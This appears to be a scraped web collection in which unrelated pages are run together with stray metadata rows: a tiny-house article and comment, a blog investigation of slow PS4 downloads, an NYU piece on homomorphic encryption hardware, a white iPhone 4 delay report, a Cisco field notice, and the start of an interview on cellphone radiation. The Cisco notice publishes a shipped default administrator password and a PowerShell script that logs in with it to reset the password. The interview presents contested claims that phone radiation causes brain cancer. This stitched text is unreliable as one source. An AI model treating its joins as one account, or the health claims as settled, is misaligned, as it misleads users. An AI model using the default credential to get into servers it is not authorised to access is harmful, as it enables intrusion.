“It is very emotional,” says Lee. “When we offer people a tiny house, they may have been on the street for four years and they finally move into a place that's heated and where they can stay and they're just overwhelmed. Then they find that they can get their life together once they're in a tiny house. They can address their health care, their mental health, and their employment situation because they can be stable.” Over the past two years, more than 300 residents of the tiny house villages moved on to permanent housing and more than 250 gained employment. Throughout her career, Lee has developed more than 4,500 units of affordable housing—providing not just the bricks and mortar, but also a stable environment for families and underserved people.

## Comments

**Frank Fay** (Wed, 06/27/2018 5:08pm)

**A Useful Tool but Not a Solution**

I fully applaud Sharon Lee’s efforts to address homelessness and affordable housing. However, the headline is wrong! While tiny houses can be a useful tool, they are not a solution to homelessness. These tiny houses do not count as shelter under Federal guidelines (as they lack indoor plumbing), which impacts scoring for Federal funding. Further, tiny houses are an inefficient use of scarce land which is under excessive demand for housing. At $250/SF, a tiny house of 8-by-12 feet (96 SF) is $24,000 in property costs alone. Using a factor of 75% to adjust for stairs, yard, kitchen facilities, and sanitary facilities brings the property cost to $32,000. Assuming the 11,000 homeless were doubled up, $176M at least is required to house them in tiny houses. For comparison, the proposed 2018 budget for the City of Seattle would spend $60M on Homeless Strategy/Investments and $60M on the Low-Income Housing Fund. Seattle has had temporary tent city (now tiny house) encampments for a decade or more, but that has not prevented a marked increase in homelessness in the past few years.
Even if shelter could be provided, there is a great lack of affordable housing for homeless, poor, low-income, and middle-income families. As in San Francisco, Los Angeles, and other cities, the influx of wealthy tech workers displaces current residents and forces low-wage service workers to the periphery. When the transportation for very long commutes fails, these families become homeless and move into the city core. It is this inequality of income and disparity of wealth that are the real problems which must be addressed. - Seattle, WA
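The commenter's cost arithmetic can be reproduced directly (a sketch; the $250/SF figure, the 75% adjustment factor, and the doubling-up assumption are all the commenter's own):

```python
cost_per_sqft = 250                     # commenter's assumed property cost, $/sq ft
house_sqft = 8 * 12                     # an 8-by-12-foot tiny house: 96 sq ft
base_cost = cost_per_sqft * house_sqft  # $24,000 in property costs alone

# Adjust for stairs, yard, kitchen and sanitary facilities (commenter's 75% factor).
adjusted_cost = base_cost / 0.75        # $32,000 per house

homeless = 11_000
houses_needed = homeless / 2            # "doubled up": two people per house
total = houses_needed * adjusted_cost

print(base_cost, adjusted_cost, total)  # 24000 32000.0 176000000.0
```

The $176M total is what the comment then compares against Seattle's proposed 2018 budget lines of $60M each.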
---

https://www.snellman.net/blog/archive/2017-08-19-slow-ps4-downloads/

# Why PS4 downloads are so slow
Game downloads on PS4 have a reputation of being very slow, with many people reporting downloads being an order of magnitude faster on Steam or Xbox. This had long been on my list of things to look into, but at a pretty low priority. After all, the PS4 operating system is based on a reasonably modern FreeBSD (9.0), so there should not be any crippling issues in the TCP stack. The implication is that the problem is something boring, like an inadequately dimensioned CDN. But then I heard that people were successfully using local HTTP proxies as a workaround. It should be pretty rare for that to actually help with download speeds, which made this sound like a much more interesting problem. This is going to be a long-winded technical post. If you're not interested in the details of the investigation but just want a recommendation on speeding up PS4 downloads, skip straight to the conclusions.

### Background

Before running any experiments, it's good to have a mental model of how the thing we're testing works, and where the problems might be. If nothing else, it will guide the initial experiment design. The speed of a steady-state TCP connection is basically defined by three numbers: the amount of data the client is willing to receive on a single round-trip (TCP receive window), the amount of data the server is willing to send on a single round-trip (TCP congestion window), and the round trip latency between the client and the server (RTT). To a first approximation, the connection speed will be:

    speed = min(rwin, cwin) / RTT

With this model, how could a proxy speed up the connection? Well, with a proxy the original connection will be split into two mostly independent parts; one connection between the client and the proxy, and another between the proxy and the server.
The speed of the end-to-end connection will be determined by the slower of those two independent connections: speed_proxy_client = min(client rwin, proxy cwin) / client-proxy RTT speed_server_proxy = min(proxy rwin, server cwin) / proxy-server RTT speed = min(speed_proxy_client, speed_server_proxy) With a local proxy the client-proxy RTT will be very low; that connection is almost guaranteed to be the faster one. The improvement will have to be from the server-proxy connection being somehow better than the direct client-server one. The RTT will not change, so there are just two options: either the client has a much smaller receive window than the proxy, or the client is somehow causing the server's congestion window to decrease. (E.g. the client is randomly dropping received packets, while the proxy isn't). Out of these two theories, the receive window one should be much more likely, so we should concentrate on it first. But that just replaces our original question with a new one: why would the client's receive window be so low that it becomes a noticeable bottleneck? There's a fairly limited number of causes for low receive windows that I've seen in the wild, and they don't really seem to fit here. - Maybe the client doesn't support the TCP window scaling option, while the proxy does. Without window scaling, the receive window will be limited to 64kB. But since we know Sony started with a TCP stack that supports window scaling, they would have had to go out of their way to disable it. Slow downloads, for no benefit. - Maybe the actual downloader application is very slow. The operating system is supposed to have a certain amount of buffer space available for each connection. If the network is delivering data to the OS faster than the application is reading it, the buffer will start to fill up, and the OS will reduce the receive window as a form of back-pressure. 
But this can't be the reason; if the application is the bottleneck, it'll be a bottleneck with or without the proxy. - The operating system is trying to dynamically scale the receive window to match the actual network conditions, but something is going wrong. This would be interesting, so it's what we're hoping to find. The initial theories are in place, let's get digging. ### Experiment #1 For our first experiment, we'll start a PSN download on a baseline non-Slim PS4, firmware 4.73. The network connection of the PS4 is bridged through a Linux machine, where we can add latency to the network using `tc netem` . By varying the added latency, we should be able to find out two things: whether the receive window really is the bottleneck, and whether the receive window is being automatically scaled by the operating system. This is what the client-server RTTs (measured from a packet capture using TCP timestamps) look like for the experimental period. Each dot represents 10 seconds of time for a single connection, with the Y axis showing the minimum RTT seen for that connection in those 10 seconds. The next graph shows the amount of data sent by the server in one round trip in red, and the receive windows advertised by the client in blue. First, since the blue dots are staying constantly at about 128kB, the operating system doesn't appear to be doing any kind of receive window scaling based on the RTT. (So much for that theory). Though at the very right end of the graph the receive window shoots out to 650kB, so it isn't totally fixed either. Second, is the receive window the bottleneck here? If so, the blue dots would be close to the red dots. This is the case until about 10:50. And then mysteriously the bottleneck moves to the server. So we didn't find quite what we were looking for, but there are a couple of very interesting things that are correlated with events on the PS4. The download was in the foreground for the whole duration of the test. 
But that doesn't mean it was the only thing running on the machine. The Netflix app was still running in the background, completely idle [1]. When the background app was closed at 11:00, the receive window increased dramatically. This suggests a second experiment, where different applications are opened / closed / left running in the background. The time where the receive window stops being the bottleneck is very close to the PS4 entering rest mode. That looks like another thing worth investigating. Unfortunately, that's not true, and rest mode is a red herring here. [2] ### Experiment #2 Below is a graph of the receive windows for a second download, annotated with the timing of various noteworthy events. The differences in receive windows at different times are striking. And more important, the changes in the receive windows correspond very well to specific things I did on the PS4. - When the download was started, the game Styx: Shards of Darkness was running in the background (just idling in the title screen). The download was limited by a receive window of under 7kB. This is an incredibly low value; it's basically going to cause the downloads to take **100 times longer than they should**. And this was not a coincidence, whenever that game was running, the receive window would be that low. - Having an app running (e.g. Netflix, Spotify) limited the receive window to 128kB, for about a 5x reduction in potential download speed. - Moving apps, games, or the download window to the foreground or background didn't have any effect on the receive window. - Launching some other games (Horizon: Zero Dawn, Uncharted 4, Dreadnought) seemed to have the same effect as running an app. - Playing an online match in a networked game (Dreadnought) caused the receive window to be artificially limited to 7kB. 
- Playing around in a non-networked game (Horizon: Zero Dawn) had a very inconsistent effect on the receive window, with the effect seemingly depending on the intensity of gameplay. This looks like a genuine resource restriction (download process getting variable amounts of CPU), rather than an artificial limit. - I ran a speedtest at a time when downloads were limited to a 7kB receive window. It got a decent receive window of over 400kB; the conclusion is that the artificial receive window limit appears to only apply to PSN downloads. - Putting the PS4 into rest mode had no effect. - Built-in features of the PS4 UI, like the web browser, do not count as apps. - When a game was started (causing the previously running game to be stopped automatically), the receive window could increase to 650kB for a very brief period of time. Basically it appears that the receive window gets unclamped when the old game stops, and then clamped again a few seconds later when the new game actually starts up. I did a few more test runs, and all of them seemed to support the above findings. The only additional information from that testing is that the rest mode behavior was dependent on the PS4 settings. Originally I had it set up to suspend apps when in rest mode. If that setting was disabled, the apps would be closed when entering rest mode, and the downloads would proceed at full speed. A 7kB receive window will be absolutely crippling for any user. A 128kB window might be ok for users who have CDN servers very close by, or who don't have a particularly fast internet. For example at my location, a 128kB receive window would cap the downloads at about 35Mbps to 75Mbps depending on which CDN the DNS RNG happens to give me. The lowest two speed tiers for my ISP are 50Mbps and 200Mbps. So either the 128kB would not be a noticeable problem (50Mbps) or it'd mean that downloads are artificially limited to 25% speed (200Mbps). 
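The arithmetic behind these estimates can be checked directly: a TCP sender can have at most one receive window of unacknowledged data in flight per round trip, so throughput is capped at roughly rwnd / RTT. A quick sketch (the RTT values here are illustrative, not taken from the packet captures):

```python
def max_throughput_mbps(rwnd_bytes: int, rtt_ms: float) -> float:
    """TCP throughput ceiling: at most one receive window per round trip."""
    return rwnd_bytes * 8 / (rtt_ms / 1000) / 1e6

# A 128kB window over CDN-distance RTTs of roughly 14-30ms gives the
# 35-75Mbps range quoted above:
print(round(max_throughput_mbps(128 * 1024, 30)))      # 35
print(round(max_throughput_mbps(128 * 1024, 14)))      # 75
# The 7kB window is crippling at any realistic RTT:
print(round(max_throughput_mbps(7 * 1024, 30), 1))     # 1.9
```

This is also why the local proxy trick mentioned at the start helps: terminating the connection nearby shrinks the RTT, so the same fixed window supports a much higher rate.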
### Conclusions If any applications are running, the PS4 appears to change the settings for PSN store downloads, artificially restricting their speed. Closing the other applications will remove the limit. There are a few important details: - Just leaving the other applications running in the background will **not help**. The exact same limit is applied whether the download progress bar is in the foreground or not. - Putting the PS4 into rest mode might or might not help, depending on your system settings. - The artificial limit applies only to the PSN store downloads. It does **not**affect e.g. the built-in speedtest. This is why the speedtest might report much higher speeds than the actual downloads, even though both are delivered from the same CDN servers. - Not all applications are equal; most of them will cause the connections to slow down by up to a factor of 5. Some games will cause a difference of about a factor of 100. Some games will start off with the factor of 5, and then migrate to the factor of 100 once you leave the start menu and start playing. - The above limits are artificial. In addition to that, actively playing a game can cause game downloads to slow down. This appears to be due to a genuine lack of CPU resources (with the game understandably having top priority). So if you're seeing slow downloads, just closing all the running applications might be worth a shot. (But it's obviously not guaranteed to help. There are other causes for slow downloads as well, this will just remove one potential bottleneck). To close the running applications, you'll need to long-press the PS button on the controller, and then select "Close applications" from the menu. The PS4 doesn't make it very obvious exactly what programs are running. For games, the interaction model is that opening a new game closes the previously running one. This is not how other apps work; they remain in the background indefinitely until you explicitly close them. 
And it gets worse than that. If your PS4 is configured to suspend any running apps when put to rest mode, you can seemingly power on the machine into a clean state, and still have a hidden background app that's causing the OS to limit your PSN download speeds. This might explain some of the superstitions about this on the Internet. There are people who swear that putting the machine to rest mode helps with speeds, others who say it does nothing. Or how after every firmware update people will report increased download speeds. Odds are that nothing actually changed in the firmware; it's just that those people had done their first full reboot in a while, and finally had a system without a background app running. ### Speculation Those were the facts as I see them. Unfortunately this raises some new questions, which can't be answered experimentally. With no facts, there's no option except to speculate wildly! **Q: Is this an intentional feature? If so, what is its purpose?** Yes, it must be intentional. The receive window changes very rapidly when applications or games are opened/closed, but not for any other reason. It's not any kind of subtle operating system level behavior; it's most likely the PS4 UI explicitly manipulating the socket receive buffers. But why? I think the idea here must be to not allow the network traffic of background downloads to take resources away from the foreground use of the PS4. For example if I'm playing an online shooter, it makes sense to harshly limit the background download speeds to make sure the game is getting ping times that are both low and predictable. So there's at least some point in that 7kB receive window limit in some circumstances. It's harder to see what the point of the 128kB receive window limit for running any app is. A single game download from some random CDN isn't going to muscle out Netflix or Youtube... The only thing I can think of is that they're afraid that multiple simultaneous downloads, e.g. 
due to automatic updates, might cause problems for playing video. But even that seems like a stretch. There's an alternate theory that this is due to some non-network resource constraints (e.g. CPU, memory, disk). I don't think that works. If the CPU or disk were the constraint, just having the appropriate priorities in place would automatically take care of this. If the download process gets starved of CPU or disk bandwidth due to a low priority, the receive buffer would fill up and the receive window would scale down dynamically, exactly when needed. And the amounts of RAM we're talking about here are minuscule on a machine with 8GB of RAM; less than a megabyte. **Q: Is this feature implemented well?** Oh dear God, no. It's hard to believe just how sloppy this implementation is. The biggest problem is that the limits get applied based just on what games/applications are currently running. That's just insane; what matters should be which games/applications someone is currently using. Especially in a console UI, it's a totally reasonable expectation that the foreground application gets priority. If I've got the download progress bar in the foreground, the system had damn well better give that download priority. Not some application that was started a month ago, and hasn't been used since. Applying these limits in rest mode with suspended apps is beyond insane. Second, these limits get applied per-connection. So if you've got a single download going, it'll get limited to 128kB of receive window. If you've got five downloads, they'll all get 128kB, for a total of 640kB. That means the efficiency of the "make sure downloads don't clog the network" policy depends purely on how many downloads are active. That's rubbish. This is all controlled on the application level, and the application knows how many downloads are active. If there really were an optimal static receive window X, it should just be split evenly across all the downloads. 
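The per-connection clamp can be made concrete with a little arithmetic. A sketch of the two policies (the "aggregate budget" variant is the hypothetical fix suggested above, not anything the PS4 actually does):

```python
CLAMP = 128 * 1024  # per-connection receive window, in bytes

def in_flight_per_connection_clamp(n_downloads: int) -> int:
    # The PS4's apparent policy: every connection gets the full clamp,
    # so total in-flight data grows linearly with the number of downloads.
    return n_downloads * CLAMP

def in_flight_aggregate_budget(n_downloads: int, budget: int = CLAMP) -> int:
    # The saner policy: split one aggregate budget evenly across downloads,
    # keeping the total roughly constant no matter how many are active.
    return n_downloads * (budget // n_downloads)

print(in_flight_per_connection_clamp(1))   # 131072 bytes (128kB)
print(in_flight_per_connection_clamp(5))   # 655360 bytes (640kB)
print(in_flight_aggregate_budget(5))       # 131070 bytes (~128kB total)
```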
Third, the core idea of applying a static receive window as a means of fighting bufferbloat is just fundamentally broken. Using the receive window as the rate limiting mechanism just means that the actual transfer rate will depend on the RTT (this is why a local proxy helps). For this kind of thing to work well, you can't have the rate limit depend on the RTT. You also can't just have somebody come up with a number once, and apply that limit to everyone. The limit needs to depend on the actual network conditions. There are ways to detect how congested the downlink is in the client-side TCP stack. The proper fix would be to implement them, and adjust the receive window of low-priority background downloads if and only if congestion becomes an issue. That would actually be a pretty valuable feature for this kind of appliance. But I can kind of forgive this one; it's not an off the shelf feature, and maybe Sony doesn't employ any TCP kernel hackers. Fourth, whatever method is being used to decide whether a game is network-latency sensitive is broken. It's absurd that a demo of a single-player game idling in the initial title screen would cause the download speeds to be totally crippled. This really should be limited to actual multiplayer titles, and ideally just to periods where someone is actually playing the game online. Just having the game running should not be enough. **Q: How can this still be a problem, 4 years after launch?** I have no idea. Sony must know that the PSN download speeds have been the butt of jokes for years. It's probably the biggest complaint people have with the system. So it's hard to believe that nobody was ever given the task of figuring out why it's slow. And this is not rocket science; anyone bothering to look into it would find these problems in a day. But it seems equally impossible that they know of the cause, but decided not to apply any of the trivial fixes to it. (Hell, it wouldn't even need to be a proper technical fix. 
It could just be a piece of text saying that downloads will work faster with all other apps closed). So while it's possible to speculate in an informed manner about other things, this particular question will remain as an open mystery. Big companies don't always get things done very efficiently, eh? ### Footnotes [1] How idle? So idle that I hadn't even logged in, the app was in the login screen. [2] To be specific, the slowdown is caused by the artificial latency changes. The PS4 downloads files in chunks, and each chunk can be served from a different CDN. The CDN that was being used from 10:51 to 11:00 was using a delay-based congestion control algorithm, and reacting to the extra latency by reducing the amount of data sent. The CDN used earlier in the connection was using a packet-loss based congestion control algorithm, and did not slow down despite seeing the latency change in exactly the same pattern.
true
true
true
PS4 downloads have a reputation of being very slow. I did some digging to find out the root cause, and was surprised.
2024-10-12 00:00:00
2017-08-19 00:00:00
https://www.snellman.net…2-rwin-thumb.png
null
snellman.net
snellman.net
null
null
38,142,727
https://spectrum.ieee.org/fully-homomorphic-encryption
The Future of Fully Homomorphic Encryption
NYU Tandon School
*This sponsored article is brought to you by NYU Tandon School of Engineering.* In our digital age, where information flows seamlessly through the vast network of the internet, the importance of encrypted data cannot be overstated. As we share, communicate, and store an increasing amount of sensitive information online, the need to safeguard it from prying eyes and malicious actors becomes paramount. Encryption serves as the digital guardian, placing our data in a lockbox of algorithms that only those with the proper key can unlock. Whether it’s personal messages, health data, financial transactions, or confidential business communications, encryption plays a pivotal role in maintaining privacy and ensuring the integrity of our digital interactions. Typically, data encryption protects data in transit: it’s locked in an encrypted “container” for transit over potentially unsecured networks, then unlocked at the other end, by the other party for analysis. But outsourcing to a third-party is inherently insecure. Brandon Reagen, Assistant Professor of Computer Science and Engineering and Electrical and Computer Engineering at the NYU Tandon School of Engineering. NYU Tandon School of Engineering But what if encryption didn’t just exist in transit and sit unprotected on either end of the transmission? What if it was possible to do all of your computer work — from basic apps to complicated algorithms — fully encrypted, from beginning to end. That is the task being taken up by Brandon Reagen, Assistant Professor of Computer Science and Engineering and Electrical and Computer Engineering at the NYU Tandon School of Engineering. Reagen, who is also a member of the NYU Center for Cybersecurity, focuses his research on designing specialized hardware accelerators for applications including privacy preserving computation. And now, he is proving that the future of computing can be privacy-forward while making huge advances in information processing and hardware design. 
## All-encompassing Encryption In a world where cyber threats are ever-evolving and data breaches are a constant concern, encrypted data acts as a shield against unauthorized access, identity theft, and other cybercrimes. It provides individuals, businesses, and organizations with a secure foundation upon which they can build trust and confidence in the digital realm. The goal of cybersecurity researchers is the protection of your data from all sorts of bad actors — cybercriminals, data-hungry companies, and authoritarian governments. And Reagen believes encrypted computing could hold an answer. “This sort of encryption can give you three major things: improved security, complete confidentiality and sometimes control over how your data is used,” says Reagen. “It’s a totally new level of privacy.” “My aim is to develop ways to run expensive applications, for example, massive neural networks, cost-effectively and efficiently, anywhere, from massive servers to smartphones” **—Brandon Reagen, NYU Tandon** Fully homomorphic encryption (FHE), one type of privacy preserving computation, offers a solution to this challenge. FHE enables computation on encrypted data, or ciphertext, to keep data protected at all times. The benefits of FHE are significant, from enabling the use of untrusted networks to enhancing data privacy. FHE is an advanced cryptographic technique, widely considered the “holy grail of encryption,” that enables users to process encrypted data while the data or models remain encrypted, preserving data privacy throughout the data computation process, not just during transit. While a number of FHE solutions have been developed, running FHE in software on standard processing hardware remains untenable for practical data security applications due to the massive processing overhead. 
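To make the idea of homomorphic computation concrete, here is a deliberately insecure toy (not a real FHE scheme, and not anything from Reagen's work): encryption is just addition of a secret key modulo N, which happens to be additively homomorphic, so an untrusted server can add ciphertexts without ever seeing the plaintexts. Real FHE schemes such as BGV or CKKS achieve this, plus multiplication, using lattice-based cryptography at enormous computational cost, which is exactly why hardware acceleration matters.

```python
# Toy additively homomorphic scheme: NOT secure, NOT real FHE.
# It only illustrates the core idea of computing on encrypted data.
N = 2**61 - 1  # public modulus; plaintexts assumed much smaller than N

def encrypt(m: int, key: int) -> int:
    return (m + key) % N

def decrypt(c: int, key: int) -> int:
    return (c - key) % N

key = 987654321
c1 = encrypt(40, key)
c2 = encrypt(2, key)

# The untrusted server adds the ciphertexts without learning 40 or 2:
c_sum = (c1 + c2) % N

# The client decrypts; two ciphertexts carry two copies of the key:
print(decrypt(c_sum, 2 * key))  # 42
```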
Reagen and his colleagues have recently been working on a DARPA-funded project called the Data Protection in Virtual Environments (DPRIVE) program, which seeks to speed up FHE computation to more usable levels. The microarchitecture of the Ring Processing Unit (RPU) designed by Reagen, one of several designs to remake cybersecurity in computing. The RPU was designed for general ring processing with high performance by taking advantage of regularity and data parallelism. NYU Tandon School of Engineering Specifically, the program seeks to develop novel approaches to data movement and management, parallel processing, custom functional units, compiler technology, and formal verification methods that ensure the design of the FHE implementation is effective and accurate, while also dramatically decreasing the performance penalty incurred by FHE computations. The target accelerator should reduce the computational run time overhead by many orders of magnitude compared to current software-based FHE computations on conventional CPUs, and accelerate FHE calculations to within one order of magnitude of current performance on unencrypted data. ## The Hardware Promising Privacy While FHE has been shown to be possible, the hardware required for it to be practical is still rapidly being developed by researchers. Reagen and his team are designing it from the ground up, including new chips, datapaths, memory hierarchies, and software stacks to make it all work together. The team was the first to show that the extreme levels of speedup needed to make HE feasible were possible. And by early next year, they'll begin manufacturing their prototypes to further their field testing. Reagen — who earned a doctoral degree in computer science from Harvard in 2018 and undergraduate degrees in computer systems engineering and applied mathematics from the University of Massachusetts, Amherst, in 2012 — focused on creating specialized hardware accelerators for applications like deep learning. 
These accelerators are specialized hardware that can be made orders of magnitude more efficient than general-purpose platforms like CPUs. Enabling accelerators requires changes to the entire compute stack, and to bring about this change, he has made several contributions to lowering the barrier of using accelerators as general architectural constructs, including benchmarking, simulation infrastructure, and System on a Chip (SoC) design. Cheetah accelerator architecture, an earlier project from Reagen. (a) The accelerator is composed of parallel PEs operating in output stationary fashion. Off-chip data is communicated via a PCIe-like streaming interface, and data is buffered on-chip using global PE SRAM. (b) Each PE contains Partial Processing Lanes which compute the HE dot product. (c) Lanes comprise individual HE operators. NYU Tandon School of Engineering “My aim is to develop ways to run expensive applications, for example, massive neural networks, cost-effectively and efficiently, anywhere, from massive servers to smartphones,” he says. Before coming to NYU Tandon, Reagen was a research scientist on Facebook’s AI Infrastructure Research team, where he became deeply involved in studying privacy. This combination of a deep cutting-edge computer hardware background and a commitment to digital security made him a perfect fit for NYU Tandon and the NYU Center for Cybersecurity, which has been at the forefront of cybersecurity research since its inception. “A lot of the big problems that we have in the world right now revolve around data. 
Consider global health coming off of COVID: if we had better ways of computing global health data analytics and sharing information without exposing private data, we might have been able to respond to the crisis more effectively and sooner” **—Brandon Reagen, NYU Tandon** For Reagen, this is an exciting moment in the history of privacy preserving computation, a field that will have huge implications for the future of data and computing. “I’m an optimist — I think this could have as big an impact as the Internet itself,” says Reagen. “And the reason is that, if you think about a lot of the big problems that we have in the world right now, a lot of them revolve around data. Consider global health. We’re just coming off of COVID, and if we had better ways of computing global health data analytics and sharing information without exposing private data, we might have been able to respond to the crisis more effectively and sooner. If we had better ways of sharing data about climate change data from all over the world, without exposing what each individual country or state or city was actually emitting, you could imagine better ways of managing and fighting global climate change. These problems are, in large part, problems of data, and this kind of software can help us solve them.” The NYU Tandon School of Engineering is the engineering and applied sciences school of New York University.
true
true
true
NYU Tandon researchers are developing specialized hardware accelerators for enabling computation on encrypted data
2024-10-12 00:00:00
2023-11-01 00:00:00
https://spectrum.ieee.or…ge.png?width=210
article
ieee.org
IEEE Spectrum
null
null
1,541,108
http://www.edibleapple.com/white-iphone-4-delayed-until-later-this-year/
Edible Apple
null
Apple issued a statement today explaining that the white model iPhone 4 will not start shipping until later this year. White models of Apple’s new iPhone 4 have continued to be more challenging to manufacture than we originally expected, and as a result they will not be available until later this year. The availability of the more popular iPhone 4 black models is not affected. Reports earlier this week indicated that the holdup is due to Apple’s demand for perfection in getting the exact shade of white they’re looking for. A Gizmodo reader noted back in late June: Actually the white on the iPhone is not painted, it is screen printed. I cannot say who I am as Apple does have a non-disclosure in effect for this, but: The color specifications for the white on the new iPhones are just crazy. The tolerances they are trying to achieve with the white really is the cause of the delay. As screen printing goes, it is somewhat controllable, doesn’t have the tolerance that Apple is wanting to hold the color specification of the white too. Talk about anal… It was originally assumed the white iPhone 4 would be released along with the black iPhone 4, but it soon became apparent that that wouldn’t be the case when the white iPhone 4 wasn’t initially available for pre-order. A few weeks later, on June 23, Apple issued a press release stating that white iPhone models wouldn’t be available until the latter part of July. And now with July slowly making way for August, customers interested in a white iPhone 4 will have to wait until sometime this Fall... maybe. Fri, Jul 23, 2010 News
true
true
true
null
2024-10-12 00:00:00
2010-07-23 00:00:00
null
null
edibleapple.com
edibleapple.com
null
null
10,930,418
http://www.cisco.com/c/en/us/support/docs/field-notices/640/fn64093.html
Field Notice: FN - 64093 - UCSC Series Default Password for Units Shipped November 17, 2015 through January 6, 2016 is Incorrect - Configuration Change Recommended
null
**THIS FIELD NOTICE IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTY OF MERCHANTABILITY. YOUR USE OF THE INFORMATION ON THE FIELD NOTICE OR MATERIALS LINKED FROM THE FIELD NOTICE IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS FIELD NOTICE AT ANY TIME.** Revision | Publish Date | Comments | ---|---|---| 1.0 | 11-Jan-16 | Initial Release | 10.0 | 28-Nov-17 | Migration to new field notice system | 10.1 | 13-Dec-17 | fixing migration of PIDs and MDF tags | 10.2 | 23-May-18 | Fixed Broken Image Links | 10.3 | 07-Dec-18 | Updated the Image Link | Affected Product ID | Comments | ---|---| UCSC-BASE-M2-C460= | Part Alternate | UCSC-BASE-M2-C460 | | UCSC-C220-M3S | | UCSC-C220-M3S= | Part Alternate | UCSC-C220-M3L= | Part Alternate | UCSC-C240-M3L | | UCSC-C240-M3S | | UCSC-C240-M3S= | Part Alternate | UCSC-C240-M3L= | Part Alternate | UCSC-C22-M3S | | UCSC-C22-M3S= | Part Alternate | UCSC-C24-M3S | | UCSC-C24-M3S= | Part Alternate | UCSC-C22-M3L | | UCSC-C22-M3L= | Part Alternate | UCSC-C420-M3 | | UCSC-C240-M3S2 | | UCSC-C240-M3S2= | Part Alternate | MXE-3500-V3-K9 | | SNS-3415-K9 | | SNS-3495-K9 | | UCSC-C220-M3SBE | | UCSC-C420-M3= | Part Alternate | MDE-1125-K9 | | MDE-3125-K9= | Part Alternate | MDE-1125-K9= | Part Alternate | MDE-3125-K9 | | N1K-1110-S | | N1K-1110-X | | CSM4-UCS2-50-K9 | | NGA3240-K9 | | N1K-1110-S= | Part Alternate | N1K-1110-X= | Part Alternate | MXE-3500-V3-K9= | Part Alternate | TCS-C220-5RP-K9 | | TCS-SMB-C220-K9 | | TCS-C220-5RP-K9= | Part Alternate | CPS-UCS-2RU-K9= | Part Alternate | CPS-UCS-2RU-K9 | | CPS-UCS-1RU-K9= | Part Alternate | CPS-UCS-1RU-K9 | | UCSC-C460-M4= | Part Alternate | UCSC-C460-M4 | | CTI-CE1K-BDL-K9 | | EXPWY-CE1K-BDL-K9 | | CAAPL-CSPC-L-V1-K9 | | EXPWY-CE1K-BDL-K9= | Part Alternate | CTI-CE1K-BDL-K9= | Part Alternate | UCSC-C220-M4L | | UCSC-C220-M4S | | UCSC-C220-M4L= | Part Alternate | UCSC-C220-M4S= | Part Alternate | UCSC-C240-M4L | 
| UCSC-C240-M4S2 | | UCSC-C240-M4SX | | UCSC-C240-M4S | | UCSC-C240-M4SX= | Part Alternate | UCSC-C240-M4S= | Part Alternate | UCSC-C240-M4S2= | Part Alternate | UCSC-C240-M4L= | Part Alternate | APIC-SERVER-L1 | | APIC-SERVER-M1 | | APIC-SERVER-L1= | Part Alternate | APIC-SERVER-M1= | Part Alternate | TG5000-K9 | | TG5500-K9 | | UCSC-C240-M4SNEBS= | Part Alternate | UCSC-C240-M4SNEBS | Defect ID | Headline | ---|---| CSCux71901 | [DOC] Rack Server Documentation on Default CIMC Password Cisco1234 | A number of C-Series servers have shipped to customers with a non-standard default password which prevents access to the Cisco Integrated Management Controller (CIMC) unless the configured password is provided. Systems manufactured between November 17, 2015 and January 6, 2016 were produced with a different default password. Customers might not be able to log in to their C-Series servers with the published default admin password "password" since this has been changed to "Cisco1234" for these systems. Customers should access the CIMC interface with this combination "admin":"Cisco1234" and set the password back to the default or a customer desired password. **Workaround #1 (Recommended)** Log in to the system with this alternate password "Cisco1234" and change it to a known password. **Workaround #2** Connect crash cart to the system. Power the system on and use the F8 menu in order to reset the CIMC to factory defaults or change the admin password: **Workaround #3** **Note**: This workaround assumes that the CIMC is online and the IP address is known. This solution is for customers who used DHCP to IP the CIMC(s). Use the XML API in order to log in to one or more systems and change the password. A sample script is provided:

    Import-Module CiscoImcPs
    $multiimc = Set-ImcPowerToolConfiguration -SupportMultipleDefaultImc $true
    # The tool prompts the user to enter IP addresses when run.
    $imclist = Read-Host "Enter Cisco IMC IP or list of IMC IPs separated by commas"
    [array]$imclist = ($imclist.split(",")).trim()
    $user = 'admin'
    # The non-standard password is on the next line (update as needed).
    $pass = ConvertTo-SecureString -String "Cisco1234" -AsPlainText -Force
    $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, $pass
    $out = Connect-Imc -Credential $cred $imclist
    # The password on the next line is the new password for this user.
    $newpass = "password"
    Get-ImcLocalUser -Id 1 | Set-ImcLocalUser -Pwd $newpass -Force | Out-GridView
    $out = Disconnect-Imc

If you require further assistance, or if you have any further questions regarding this field notice, please contact the Cisco Systems Technical Assistance Center (TAC) by one of the following methods: Cisco Notification Service—Set up a profile to receive email updates about reliability, safety, network security, and end-of-sale issues for the Cisco products you specify.
true
true
true
A number of C-Series servers have shipped to customers with a non-standard default password which prevents access to the Cisco Integrated Management Controller (CIMC) unless the configured password is provided.
2024-10-12 00:00:00
2018-12-07 00:00:00
null
website
cisco.com
Cisco
null
null
19,075,021
https://www.jaybosamiya.com/x/questions.txt
null
null
null
true
false
false
null
null
null
null
null
null
null
null
null
27,773,814
https://publichealth.berkeley.edu/news-media/research-highlights/moskowitz-cellphone-radiation-is-harmful-but-few-want-to-believe-it/
Moskowitz: Cellphone radiation is harmful, but few want to believe it - Berkeley News
Anne Brice
# Moskowitz: Cellphone radiation is harmful, but few want to believe it *The telecommunications industry insists cellphone technology is safe. But the director of UC Berkeley’s Center for Family and Community Health is determined to prove it wrong.* July 1, 2021 *For more than a decade, Joel Moskowitz, a researcher in the School of Public Health at UC Berkeley and director of Berkeley’s Center for Family and Community Health, has been on a quest to prove that radiation from cellphones is unsafe. But, he said, most people don’t want to hear it.* *“People are addicted to their smartphones,” said Moskowitz. “We use them for everything now, and, in many ways, we need them to function in our daily lives. I think the idea that they’re potentially harming our health is too much for some people.”* *Since cellphones first came onto the market in 1983, they have gone from clunky devices with bad reception to today’s sleek, multifunction smartphones. And although cellphones are now used by nearly all American adults, considerable research suggests that long-term use poses health risks from the radiation they emit, said Moskowitz.* *“Cellphones, cell towers and other wireless devices are regulated by most governments,” said Moskowitz. “Our government, however, stopped funding research on the health effects of radiofrequency radiation in the 1990s.”* *Since then, he said, research has shown significant adverse biologic and health effects — including brain cancer — associated with the use of cellphones and other wireless devices. And now, he said, with the fifth generation of cellular technology, known as 5G, there is an even bigger reason for concern.* *Berkeley News* spoke with Moskowitz about the health risks of cellphone radiation, why the topic is so controversial and what we can expect with the rollout of 5G. *Berkeley News:* I think something we should address upfront is how controversial this research is. 
